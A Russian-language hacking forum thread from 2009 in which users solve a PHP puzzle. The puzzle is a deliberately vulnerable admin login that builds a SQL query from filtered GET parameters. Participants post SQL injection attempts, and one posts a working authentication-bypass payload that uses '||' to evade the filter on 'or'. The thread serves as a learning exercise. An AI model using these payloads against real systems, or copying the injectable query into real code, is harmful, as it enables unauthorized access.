Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
03.09.2009, 00:53
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
От мну
Задание: Нужно попасть в админку, обойдите авторизацию
Меджик_квотес=офф
PHP код:
<?php
$login = substr($_GET['login'],0,8);
$password = substr($_GET['password'],0,8);
$login = str_replace('#', '', $login);
$login = str_replace("-", '', $login);
$login = str_replace('*', '', $login);
$password = str_replace('#', '', $password);
$password = str_replace("-", '', $password);
$password = str_replace('*', '', $password);
$login = preg_replace("/and|or/i","fuck",$login);
$password = preg_replace("/and|or/i","fuck",$password);
$query = "select * from `admin` where login = '$login' and password = '$password'";
$result = mysql_query($query);
if(mysql_num_rows($result) > 0)
{
//в админке
}
. . .
?>
|
|
|
03.09.2009, 01:22
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
Народ,ща я с мобилы,поэтому добавлять ваши задания/ответы не могу.
Подумаю над разделением заданий на темы.
В планах сделать 100 заданий) и сделать пдфку! 100 пхп заданий
|
|
|
|
03.09.2009, 10:48
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Сообщение от ElteRUS
От мну
Задание: Нужно попасть в админку, обойдите авторизацию
Меджик_квотес=офф
Код:
?=login=-1' or 1=1&password=1
|
|
|
|
03.09.2009, 11:18
|
|
Участник форума
Регистрация: 08.04.2008
Сообщений: 242
Провел на форуме:
2230263
Репутация:
229
|
|
Сообщение от DIAgen
Код:
?=login=-1' or 1=1&password=1
а ничего что
Код:
$login = preg_replace("/and|or/i","fuck",$login);
разве замена 'or' не произойдет?
|
|
|
|
03.09.2009, 11:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от DIAgen
Код:
?=login=-1' or 1=1&password=1
Так ведь не прокатит 
PHP код:
$login = preg_replace("/and|or/i","fuck",$login);
Суть в том, чтобы обойтись без or
|
|
|
|
03.09.2009, 11:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
ну раз так, то OR заменим на ||
|
|
|
|
03.09.2009, 12:12
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
geezer.code, ограничение на 8 символов. К тому же, DIAgen не обработал закрывающую логин кавычку
|
|
|
|
03.09.2009, 12:37
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Хм, правда не знаю Почти на 100% уверен что метод отсекает "and password = '$password'" так как с ним замутить выборку, не зная пароля имхо нереально. Возможно, юзается неизвестный науке тип комментария? |
|
|
|
03.09.2009, 14:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 25.04.2008
Сообщений: 827
Провел на форуме:
2769640
Репутация:
1304
|
|
Joker-jar 8 символов даже много
Код:
?login=&password=' || '1
__________________
Любая действущая программа устарела.
Создайте систему, которой сможет пользоваться даже дурак ,и только дурак захочет ею пользоваться.
Как правильно задавать вопросы: _http://www.yakimchuk.ru/questions.htm
|
|
|
|
03.09.2009, 16:06
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
ОМФГ точно, что то у меня с приоритетами логических операций глюк в голове вышел ))) Gifts, крут, не проверял правда, но на глаз оно.
З.Ы. Я предполагал, что (...) or '1' мускуль скушает как истину, но что то упёрся я в этот login и все туда пытался подставлять |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
